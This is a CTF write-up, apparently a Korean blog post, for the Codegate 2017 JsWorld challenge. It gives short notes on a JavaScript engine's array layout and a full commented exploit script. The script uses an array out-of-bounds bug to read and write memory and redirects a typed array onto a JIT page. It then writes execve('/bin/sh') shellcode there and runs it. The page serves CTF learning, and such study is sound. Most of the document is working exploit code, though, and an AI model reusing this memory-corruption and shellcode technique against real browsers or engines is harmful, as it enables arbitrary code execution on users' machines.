Codegate 2017 JsWorld
HSr00t
2018. 5. 10. 17:00
b*js::math_atan vp=(주소)
주소 + 2(qword)를 하면 인자 주소가 나온다
JS:array는 int ?? + int rel_size + int ?? int_length_size + data가 들어감. rel_size 옆에 데이터를 가리키는 주소가 있음
WinMerge 프로그램으로 소스를 비교하면서 취약점을 찾을 수 있음
아래 주소에 모든 것이 들어가 있다.
참고: https://bpsecblog.wordpress.com/2017/04/27/javascript_engine_array_oob/
// Writeup script for the Codegate 2017 JsWorld challenge. It appears to
// depend on the exact allocation order and on the repeated jit_read() calls,
// so the statement order below must be kept as the author wrote it.

// --- helpers: reinterpret a double's 64 raw bits as two uint32 halves ---

// Returns the raw bits of double `d` as [high32, low32]. The Uint32Array is a
// view over the Float64Array's buffer; on a little-endian host element 1 is
// the high word (assumed here, not checked).
function d_to_i2(d){ var a = new Uint32Array(new Float64Array([d]).buffer); return [a[1], a[0]]; }

// Inverse of d_to_i2: the double whose raw bits are x[0] (high) and x[1] (low).
function i2_to_d(x){ return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0]; }

// Zero-pads each half to exactly 8 hex digits; returns [highHex, lowHex].
function i2_to_hex(i2){ var v1 = ("00000000" + i2[0].toString(16)).substr(-8); var v2 = ("00000000" + i2[1].toString(16)).substr(-8); return [v1,v2]; }

// 16-hex-digit string of a double's raw bits, high half first.
// d_to_i2 is evaluated twice here; both evaluations yield the same pair.
function p_i2(d){ return (i2_to_hex(d_to_i2(d))[0]+i2_to_hex(d_to_i2(d))[1]) }

// Only prints; both parameters are unused. It is called 500 times below and
// once more at the very end (the name suggests the repeated calls are meant
// to get it compiled by the JIT, but the page does not say so explicitly).
function jit_read(data1,data2) { print('\nABCD') }

var a = new Array(1);
a[0] = 0x41414141;
var uint = new Uint32Array(1000);
// Fill uint with a recognisable value so its storage can be located below.
for(var i =0;i<1000;i++) { uint[i] = 1000; }

// Two pops on a one-element array. The array-OOB reference linked above is
// presumably the bug that lets the a[i] reads below run past the array's end;
// the page itself does not spell this out.
a.pop(); a.pop();

// Scan forward through a until the 1000 fill value appears: `uo` is the index
// (relative to a) at which uint's data starts. `uo` is an implicit global.
for(var i=0;;i++) { if(a[i]==1000) { break } }
uo = i; //uint_offset
print('\n');
for(var j=0;j<500;j++) { jit_read('A','B'); }

// Search for a fixed 64-bit pattern; its meaning is not stated on the page
// (presumably a header value the author observed in the debugger).
// `idx` is redeclared further down and reused as the word counter.
var idx = 0;
for(var j=0;;j++) { if(p_i2(a[j])=='0000018000000191') { idx = j; break; } }
// Per the note above, the slot next to rel_size holds the data pointer.
uint_data = p_i2(a[uo+2]);

// The typed array assigned here is discarded immediately: `shell` is
// reassigned to a string on the next line.
var shell = new Uint32Array(27);
shell = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
print('\n');
jit = p_i2(a[idx-2]);
a[uo+2] = (a[idx-2]); //uint data -> jit address
print('Jit: '+jit);
print('uint data: '+uint_data);

// Pack the string 4 bytes per uint32 by reversing its hex digits pairwise
// (i.e. little-endian word order). Note toString(16) does not zero-pad, so a
// byte below 0x10 yields a single digit and breaks the pairing; in this
// string only the final 3-byte group is affected, which is why that word is
// overwritten by hand after the loop.
var hex = ''; var temp = ''; var idx = 0;
for(var i=0;i<shell.length;i+=4) {
  hex = '';
  for(var j=0;j<4;j++) { //uint32_t == 4byte
    // shell is a string, so indexing past its end yields undefined.
    if(shell[i+j]!=undefined) hex+=(shell.charCodeAt(i+j).toString(16));
  }
  hex = hex.split('');
  temp = '';
  for(var j=0;j<8;j+=2) { temp += hex[hex.length-j-2] + hex[hex.length-j-1]; }
  uint[idx] = parseInt('0x'+temp);
  idx+=1;
}
// Last group (bytes 3b 0f 05) written explicitly; see the note above the loop.
uint[idx-1] = 0x050f3b;
jit_read('A','B'); //Math.atan(a);